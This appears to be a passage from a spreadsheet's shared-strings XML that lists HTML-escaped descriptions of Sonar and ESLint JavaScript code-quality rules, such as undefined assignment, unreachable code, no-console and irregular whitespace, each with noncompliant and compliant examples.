    <t>&lt;p&gt;&lt;code&gt;undefined&lt;/code&gt; is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. Instead,\n&lt;code&gt;null&lt;/code&gt; should be used, allowing you to tell the difference between a property that has been reset and one that was never created.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar myObject = {};\n\n// ...\nmyObject.fname = undefined;  // Noncompliant\n// ...\n\nif (myObject.lname == undefined) {\n  // property not yet created\n}\nif (myObject.fname == undefined) {\n  // no real way of knowing the true state of myObject.fname\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar myObject = {};\n\n// ...\nmyObject.fname = null;\n// ...\n\nif (myObject.lname == undefined) {\n  // property not yet created\n}\nif (myObject.fname == undefined) {\n  // no real way of knowing the true state of myObject.fname\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;code&gt;Symbol&lt;/code&gt; is a primitive type introduced in ECMAScript2015. Its instances are mainly used as unique property keys.&lt;/p&gt;\n&lt;p&gt;An instance can only be created by using &lt;code&gt;Symbol&lt;/code&gt; as a function. Using &lt;code&gt;Symbol&lt;/code&gt; with the &lt;code&gt;new&lt;/code&gt; operator will raise\na &lt;code&gt;TypeError&lt;/code&gt;.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nconst sym = new Symbol("foo");   // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nconst sym = Symbol("foo");\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;In the absence of enclosing curly braces, the line immediately after a conditional is the one that is conditionally executed. By both convention\nand good practice, such lines are indented. In the absence of both curly braces and indentation the intent of the original programmer is entirely\nunclear and perhaps not actually what is executed. Additionally, such code is highly likely to be confusing to maintainers.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (condition)  // Noncompliant\ndoTheThing();\n\ndoTheOtherThing();\nsomethingElseEntirely();\n\nfoo();\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (condition)\n  doTheThing();\n\ndoTheOtherThing();\nsomethingElseEntirely();\n\nfoo();\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The result of an expression with an arithmetic operator &lt;code&gt;/, *, %, ++, --, -, +=, -=, *=, /=, %=, +&lt;/code&gt; or unary operator &lt;code&gt;+, -&lt;/code&gt;\nwhen at least one operand is &lt;code&gt;Object&lt;/code&gt; or &lt;code&gt;Undefined&lt;/code&gt; will be always a &lt;code&gt;NaN&lt;/code&gt; (Not a Number).&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nx = [1, 2];\nvar y = x / 4;  //Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Exceptions&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;code&gt;Date&lt;/code&gt; operands: they are implicitly converted to numbers. &lt;/li&gt;\n  &lt;li&gt; The binary &lt;code&gt;+&lt;/code&gt; operator with &lt;code&gt;Object&lt;/code&gt; operand (concatenation). &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Overriding an object changes its behavior and could potentially impact all code using that object. Overriding standard, built-in objects could\ntherefore have broad, potentially catastrophic effects on previously-working code.&lt;/p&gt;\n&lt;p&gt;This rule detects overrides of the following native objects:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; Fundamental objects - Object, Function, Boolean, Symbol, Error, EvalError, InternalError, RangeError, ReferenceError, SyntaxError, TypeError,\n  URIError &lt;/li&gt;\n  &lt;li&gt; Numbers and dates - Number, Math, Date &lt;/li&gt;\n  &lt;li&gt; Text processing - String, RegExp &lt;/li&gt;\n  &lt;li&gt; Indexed collections - Array, Int8Array, Uint8Array, Uint8ClampedArray, Int16Array, Unit16Array, Int32Array, Uint32Array, Float32Array,\n  Float64Array &lt;/li&gt;\n  &lt;li&gt; Keyed collections - Map, Set, WeakMap, WeakSet &lt;/li&gt;\n  &lt;li&gt; Structured data - ArrayBuffer, DataView, JSON &lt;/li&gt;\n  &lt;li&gt; Control abstraction objects - Promise &lt;/li&gt;\n  &lt;li&gt; Reflection - Reflect, Proxy &lt;/li&gt;\n  &lt;li&gt; Internationalization - Intl &lt;/li&gt;\n  &lt;li&gt; Non-standard objects - Generator, Iterator, ParallelArray, StopIteration &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.&lt;/p&gt;\n&lt;p&gt;This rule applies for the following methods of an array:&lt;/p&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;code&gt;Array.from&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.every&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.filter&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.find&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.findIndex&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.map&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.reduce&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.reduceRight&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.some&lt;/code&gt; &lt;/li&gt;\n  &lt;li&gt; &lt;code&gt;Array.prototype.sort&lt;/code&gt; &lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar merged = arr.reduce(function(a, b) {\n  a.concat(b);\n}); // Noncompliant: No return statement\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar merged = arr.reduce(function(a, b) {\n  return a.concat(b);\n});\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;When a collection is populated but its contents are never used, then it is surely some kind of mistake. Either refactoring has rendered the\ncollection moot, or an access is missing.&lt;/p&gt;\n&lt;p&gt;This rule raises an issue when no methods are called on a collection other than those that add or remove values.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction getLength(a, b, c) {\n  const strings = [];  // Noncompliant\n  strings.push(a);\n  strings.push(b);\n  strings.push(c);\n\n  return a.length + b.length + c.length;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction getLength(a, b, c) {\n  return a.length + b.length + c.length;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Loop counters should not be modified in the body of the loop. However other loop control variables representing logical values may be modified in\nthe loop, for example a flag to indicate that something has been completed, which is then tested in the for statement.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar names = [ "Jack", "Jim", "", "John" ];\nfor (var i = 0; i &amp;lt; names.length; i++) {\n  if (!names[i]) {\n    i = names.length;                                 // Non-Compliant\n  } else {\n    console.log(names[i]);\n  }\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar names = [ "Jack", "Jim", "", "John" ];\nfor (var name of names) {\n  if (!name) {\n    break;                                 // Compliant\n  } else {\n    console.log(name);\n  }\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of comparison operators (&lt;code&gt;&amp;lt;&lt;/code&gt;, &lt;code&gt;&amp;lt;=&lt;/code&gt;, &lt;code&gt;&amp;gt;=&lt;/code&gt;, &lt;code&gt;&amp;gt;&lt;/code&gt;) with strings is not likely to yield\nthe expected results. Make sure the intention was to compare strings and not numbers.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar appleNumber = "123";\nvar orangeNumber = "45";\nif (appleNumber &amp;lt; orangeNumber) {  // Noncompliant, this condition is true\n  alert("There are more oranges");\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar appleNumber = "123";\nvar orangeNumber = "45";\nif (Number(appleNumber) &amp;lt; Number(orangeNumber)) {\n  alert("There are more oranges");\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Because semicolons at the ends of statements are optional, starting function call arguments on a separate line makes the code confusing. It could\nlead to errors and most likely &lt;em&gt;will&lt;/em&gt; lead to questions for maintainers.&lt;/p&gt;\n&lt;p&gt;What was the initial intent of the developer?&lt;/p&gt;\n&lt;ol&gt;\n  &lt;li&gt; Define a function and then execute some unrelated code inside a closure ? &lt;/li&gt;\n  &lt;li&gt; Pass the second function as a parameter to the first one ? &lt;/li&gt;\n&lt;/ol&gt;\n&lt;p&gt;The first option will be the one chosen by the JavaScript interpreter.&lt;/p&gt;\n&lt;p&gt;By extension, and to improve readability, any kind of function call argument should not start on new line.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar fn = function () {\n  //...\n}\n\n(function () { // Noncompliant\n  //...\n})();\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;p&gt;Either&lt;/p&gt;\n&lt;pre&gt;\n// define a function\nvar fn = function () {\n  //...\n}; // &amp;lt;-- semicolon added\n\n// then execute some code inside a closure\n(function () {\n  //...\n})();\n&lt;/pre&gt;\n&lt;p&gt;Or &lt;/p&gt;\n&lt;pre&gt;\nvar fn = function () {\n  //...\n}(function () { // &amp;lt;-- start function call arguments on same line\n  //...\n})();\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Unlike strongly typed languages, JavaScript does not enforce a return type on a function. This means that different paths through a function can\nreturn different types of values, which can be very confusing to the user and significantly harder to maintain.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo(a) {  // Noncompliant\n  if (a === 1) {\n    return true;\n  }\n  return 3;\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction foo(a) {\n  if (a === 1) {\n    return true;\n  }\n  return false;\n}\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>Related "if/else if" statements should not have the same condition</t>
  </si>
  <si>
    <t>&lt;p&gt;A chain of &lt;code&gt;if&lt;/code&gt;/&lt;code&gt;else if&lt;/code&gt; statements is evaluated from top to bottom. At most, only one branch will be executed: the first\none with a condition that evaluates to &lt;code&gt;true&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Therefore, duplicating a condition automatically leads to dead code. Usually, this is due to a copy/paste error. At best, it's simply dead code and\nat worst, it's a bug that is likely to induce further bugs as the code is maintained, and obviously it could lead to unexpected behavior.&lt;/p&gt;\n&lt;p&gt;&amp;nbsp;&lt;/p&gt;\n&lt;p&gt;&lt;em&gt;Note that this rule requires Node.js to be available during analysis.&lt;/em&gt;&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (param == 1)\n  openWindow();\nelse if (param == 2)\n  closeWindow();\nelse if (param == 1)  // Noncompliant\n  moveWindowToTheBackground();\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (param == 1)\n  openWindow();\nelse if (param == 2)\n  closeWindow();\nelse if (param == 3)\n  moveWindowToTheBackground();\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://www.securecoding.cert.org/confluence/x/NYA5"&gt;CERT, MSC12-C.&lt;/a&gt; - Detect and remove code that has no effect or is never\n  executed &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The size of a collection and the length of an array are always greater than or equal to zero. So testing that a size or length is greater than or\nequal to zero doesn't make sense, since the result is always &lt;code&gt;true&lt;/code&gt;. Similarly testing that it is less than zero will always return\n&lt;code&gt;false&lt;/code&gt;. Perhaps the intent was to check the non-emptiness of the collection or array instead. &lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nif (someSet.size &amp;gt;= 0) {...} // Noncompliant\n\nif (someMap.size &amp;lt; 0) {...} // Noncompliant\n\nconst result = someArray.length &amp;gt;= 0;  // Noncompliant\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nif (someSet.size &amp;gt; 0) {...}\n\nif (someMap.size == 0) {...}\n\nconst result = someArray.length &amp;gt; 0;\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Associative arrays allow you to store values in an array with either numeric or named indexes. But creating and populating an object is just as\neasy as an array, and more reliable if you need named members.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob';  // Noncompliant\narr[1] = 'foo';\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nlet obj = {\n  name: 'bob',\n  arr: ['a', 'foo']\n};\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;The ability to define default values for function parameters can make a function easier to use. Default parameter values allow callers to specify\nas many or as few arguments as they want while getting the same functionality and minimizing boilerplate, wrapper code.&lt;/p&gt;\n&lt;p&gt;But all function parameters with default values should be declared after the function parameters without default values. Otherwise, it makes it\nimpossible for callers to take advantage of defaults; they must re-specify the defaulted values or pass &lt;code&gt;undefined&lt;/code&gt; in order to "get to"\nthe non-default parameters.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nfunction multiply(a = 1, b) {  // Noncompliant\n  return a*b;\n}\n\nvar x = multiply(42);  // returns NaN as b is undefined\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nfunction multiply(b, a = 1) {\n  return a*b;\n}\n\nvar x = multiply(42);  // returns 42 as expected\n&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Most checks against an &lt;code&gt;indexOf&lt;/code&gt; call against a string or array compare it with -1 because 0 is a valid index. Any checks which look for\nvalues &amp;gt;0 ignore the first element, which is likely a bug. If you're merely checking the presence of the string, consider using\n&lt;code&gt;includes&lt;/code&gt; instead. Before using&amp;nbsp;&lt;code&gt;includes&lt;/code&gt; method make sure that your browser version is supporting it.&lt;/p&gt;\n&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;\n&lt;pre&gt;\nvar color = "blue";\nvar name = "ishmael";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf("blue") &amp;gt; 0) { // Noncompliant\n  // ...\n}\nif (name.indexOf("ish") &amp;gt; 0) { // Noncompliant\n  // ...\n}\n&lt;/pre&gt;\n&lt;h2&gt;Compliant Solution&lt;/h2&gt;\n&lt;pre&gt;\nvar color = "blue";\nvar name = "ishmael";\nvar number = 123;\n\nvar arr = [color, name];\n\nif (arr.indexOf("blue") &amp;gt;= 0) {\n  // ...\n}\nif (name.includes("ish")) {\n  // ...\n}\n&lt;/pre&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes"&gt;String.prototype.includes()&lt;/a&gt;\n  documentation at MDN &lt;/li&gt;\n  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/includes"&gt;Array.prototype.includes()&lt;/a&gt;\n  documentation at MDN &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.&lt;/p&gt;\n&lt;h2&gt;See&lt;/h2&gt;\n&lt;ul&gt;\n  &lt;li&gt; &lt;a href="https://redirect.sonarsource.com/doc/cognitive-complexity.html"&gt;Cognitive Complexity&lt;/a&gt; &lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>Sonar JAVASCRIPT RULES (Used in Salesforce Lightning Profile)</t>
  </si>
  <si>
    <t>cs-js:no-console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</si>
  <si>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</si>
  <si>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production.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;console.log("Made it here.");\nconsole.error("That shouldn't have happened.");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows calls to methods of the &lt;code&gt;console&lt;/code&gt; object.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-console: "error"*/\n\nconsole.log("Log a debug level message.");\nconsole.warn("Log a warn level message.");\nconsole.error("Log an error level message.");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-console: "error"*/\n\n// custom console\nConsole.log("Hello world!");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has an object option for exceptions:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"allow"&lt;/code&gt; has an array of strings which are allowed methods of the &lt;code&gt;console&lt;/code&gt; object&lt;/li&gt;\n&lt;/ul&gt;\n&lt;p&gt;Examples of additional &lt;strong&gt;correct&lt;/strong&gt; code for this rule with a sample &lt;code&gt;{ "allow": ["warn", "error"] }&lt;/code&gt; option:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-console: ["error", { allow: ["warn", "error"] }] */\n\nconsole.warn("Log a warn level message.");\nconsole.error("Log an error level message.");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you're using Node.js, however, &lt;code&gt;console&lt;/code&gt; is used to output information to the user and so is not strictly used for debugging purposes. If you are developing for Node.js then you most likely do not want this rule enabled.&lt;/p&gt;\n&lt;p&gt;Another case where you might not use this rule is if you want to enforce console calls and not console overwrites. For example:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-console: ["error", { allow: ["warn"] }] */\nconsole.error = function (message) {\n  throw new Error(message);\n};\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;With the &lt;code&gt;no-console&lt;/code&gt; rule in the above example, ESLint will report an error. For the above example, you can disable the rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;// eslint-disable-next-line no-console\nconsole.error = function (message) {\n  throw new Error(message);\n};\n\n// or\n\nconsole.error = function (message) {  // eslint-disable-line no-console\n  throw new Error(message);\n};\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;However, you might not want to manually add &lt;code&gt;eslint-disable-next-line&lt;/code&gt; or &lt;code&gt;eslint-disable-line&lt;/code&gt;. You can achieve the effect of only receiving errors for console calls with the &lt;code&gt;no-restricted-syntax&lt;/code&gt; rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="json language-json"&gt;{\n    "rules": {\n        "no-console": "off",\n        "no-restricted-syntax": [\n            "error",\n            {\n                "selector": "CallExpression[callee.object.name='console'][callee.property.name!=/^(log|warn|error|info|trace)$/]",\n                "message": "Unexpected property on console object was called"\n            }\n        ]\n    }\n}\n&lt;/code&gt;&lt;/pre&gt;</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</si>
  <si>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example:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;var boundGetName = (function getName() {\n    return this.name;\n}).bind({ name: "ESLint" });\n\nconsole.log(boundGetName());      // "ESLint"\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;This code is an example of a good use of &lt;code&gt;bind()&lt;/code&gt; for setting the value of &lt;code&gt;this&lt;/code&gt;.&lt;/p&gt;\n&lt;p&gt;Sometimes during the course of code maintenance, the &lt;code&gt;this&lt;/code&gt; value is removed from the function body. In that case, you can end up with a call to &lt;code&gt;bind()&lt;/code&gt; that doesn't accomplish anything:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;// useless bind\nvar boundGetName = (function getName() {\n    return "ESLint";\n}).bind({ name: "ESLint" });\n\nconsole.log(boundGetName());      // "ESLint"\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;In this code, the reference to &lt;code&gt;this&lt;/code&gt; has been removed but &lt;code&gt;bind()&lt;/code&gt; is still used. In this case, the &lt;code&gt;bind()&lt;/code&gt; is unnecessary overhead (and a performance hit) and can be safely removed.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This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binding.&lt;/p&gt;\n&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Arrow functions can never have their &lt;code&gt;this&lt;/code&gt; value set using &lt;code&gt;bind()&lt;/code&gt;. This rule flags all uses of &lt;code&gt;bind()&lt;/code&gt; with arrow functions as a problem&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-bind: "error"*/\n/*eslint-env es6*/\n\nvar x = function () {\n    foo();\n}.bind(bar);\n\nvar x = (() =&amp;gt; {\n    foo();\n}).bind(bar);\n\nvar x = (() =&amp;gt; {\n    this.foo();\n}).bind(bar);\n\nvar x = function () {\n    (function () {\n      this.foo();\n    }());\n}.bind(bar);\n\nvar x = function () {\n    function foo() {\n      this.bar();\n    }\n}.bind(baz);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-extra-bind: "error"*/\n\nvar x = function () {\n    this.foo();\n}.bind(bar);\n\nvar x = function (a) {\n    return a + 1;\n}.bind(foo, bar);\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="whennottouseit"&gt;When Not To Use It&lt;/h2&gt;\n&lt;p&gt;If you are not concerned about unnecessary calls to &lt;code&gt;bind()&lt;/code&gt;, you can safely disable this rule.&lt;/p&gt;\n&lt;h2 id="furtherreading"&gt;Further Reading&lt;/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function/bind"&gt;Function.prototype.bind&lt;/a&gt;&lt;/li&gt;\n&lt;li&gt;&lt;a href="https://www.smashingmagazine.com/2014/01/understanding-javascript-function-prototype-bind/"&gt;Understanding JavaScript's Function.prototype.bind&lt;/a&gt;&lt;/li&gt;\n&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Comparing a variable against itself is usually an error, either a typo or refactoring error. It is confusing to the reader and may potentially introduce a runtime error.&lt;/p&gt;\n&lt;p&gt;The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comparison.&lt;/p&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This error is raised to highlight a potentially confusing and potentially pointless piece of code. There are almost no situations in which you would need to compare something to itself.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-self-compare: "error"*/\n\nvar x = 10;\nif (x === x) {\n    x = 20;\n}\n&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Because the &lt;code&gt;return&lt;/code&gt;, &lt;code&gt;throw&lt;/code&gt;, &lt;code&gt;break&lt;/code&gt;, and &lt;code&gt;continue&lt;/code&gt; statements unconditionally exit a block of code, any statements after them cannot be executed. Unreachable statements are usually a mistake.&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;function fn() {\n    x = 1;\n    return x;\n    x = 3; // this will never execute\n}\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule disallows unreachable code after &lt;code&gt;return&lt;/code&gt;, &lt;code&gt;throw&lt;/code&gt;, &lt;code&gt;continue&lt;/code&gt;, and &lt;code&gt;break&lt;/code&gt; statements.&lt;/p&gt;\n&lt;p&gt;Examples of &lt;strong&gt;incorrect&lt;/strong&gt; code for this rule:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unreachable: "error"*/\n\nfunction foo() {\n    return true;\n    console.log("done");\n}\n\nfunction bar() {\n    throw new Error("Oops!");\n    console.log("done");\n}\n\nwhile(value) {\n    break;\n    console.log("done");\n}\n\nthrow new Error("Oops!");\nconsole.log("done");\n\nfunction baz() {\n    if (Math.random() &amp;lt; 0.5) {\n        return;\n    } else {\n        throw new Error();\n    }\n    console.log("done");\n}\n\nfor (;;) {}\nconsole.log("done");\n&lt;/code&gt;&lt;/pre&gt;\n&lt;p&gt;Examples of &lt;strong&gt;correct&lt;/strong&gt; code for this rule, because of JavaScript function and variable hoisting:&lt;/p&gt;\n&lt;pre&gt;&lt;code class="js language-js"&gt;/*eslint no-unreachable: "error"*/\n\nfunction foo() {\n    return bar();\n    function bar() {\n        return 1;\n    }\n}\n\nfunction bar() {\n    return x;\n    var x;\n}\n\nswitch (foo) {\n    case 1:\n        break;\n        var x;\n}\n&lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Invalid or irregular whitespace causes issues with ECMAScript 5 parsers and also makes code harder to debug in a similar nature to mixed tabs and spaces.&lt;/p&gt;\n&lt;p&gt;Various whitespace characters can be inputted by programmers by mistake for example from copying or keyboard shortcuts. Pressing Alt + Space on macOS adds in a non breaking space character for example.&lt;/p&gt;\n&lt;p&gt;Known issues these spaces cause:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;Zero Width Space&lt;ul&gt;\n&lt;li&gt;Is NOT considered a separator for tokens and is often parsed as an &lt;code&gt;Unexpected token ILLEGAL&lt;/code&gt;&lt;/li&gt;\n&lt;li&gt;Is NOT shown in modern browsers making code repository software expected to resolve the visualization&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;\n&lt;li&gt;Line Separator&lt;ul&gt;\n&lt;li&gt;Is NOT a valid character within JSON which would cause parse errors&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h2 id="ruledetails"&gt;Rule Details&lt;/h2&gt;\n&lt;p&gt;This rule is aimed at catching invalid whitespace that is not a normal tab and space. Some of these characters may cause issues in modern browsers and others will be a debugging issue to spot.&lt;/p&gt;\n&lt;p&gt;This rule disallows the following characters except where the options allow:&lt;/p&gt;\n&lt;pre&gt;&lt;code&gt;\u000B - Line Tabulation (\v) - &amp;lt;VT&amp;gt;\n\u000C - Form Feed (\f) - &amp;lt;FF&amp;gt;\n\u00A0 - No-Break Space - &amp;lt;NBSP&amp;gt;\n\u0085 - Next Line\n\u1680 - Ogham Space Mark\n\u180E - Mongolian Vowel Separator - &amp;lt;MVS&amp;gt;\n\ufeff - Zero Width No-Break Space - &amp;lt;BOM&amp;gt;\n\u2000 - En Quad\n\u2001 - Em Quad\n\u2002 - En Space - &amp;lt;ENSP&amp;gt;\n\u2003 - Em Space - &amp;lt;EMSP&amp;gt;\n\u2004 - Tree-Per-Em\n\u2005 - Four-Per-Em\n\u2006 - Six-Per-Em\n\u2007 - Figure Space\n\u2008 - Punctuation Space - &amp;lt;PUNCSP&amp;gt;\n\u2009 - Thin Space\n\u200A - Hair Space\n\u200B - Zero Width Space - &amp;lt;ZWSP&amp;gt;\n\u2028 - Line Separator\n\u2029 - Paragraph Separator\n\u202F - Narrow No-Break Space\n\u205f - Medium Mathematical Space\n\u3000 - Ideographic Space\n&lt;/code&gt;&lt;/pre&gt;\n&lt;h2 id="options"&gt;Options&lt;/h2&gt;\n&lt;p&gt;This rule has an object option for exceptions:&lt;/p&gt;\n&lt;ul&gt;\n&lt;li&gt;&lt;code&gt;"skipStrings": true&lt;/code&gt; (default) allows any whitespace characters in string literals&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"skipComments": true&lt;/code&gt; allows any whitespace characters in comments&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"skipRegExps": true&lt;/code&gt; allows any whitespace characters in regular expression literals&lt;/li&gt;\n&lt;li&gt;&lt;code&gt;"skipTemplates": true&lt;/code&gt; allows any whitespace characters in template literals&lt;/li&gt;\n&lt;/ul&gt;\n&lt;h3 id="skipstrings"&gt;skipStrings&lt;/h3&gt;\n&lt;p&gt;Examples of 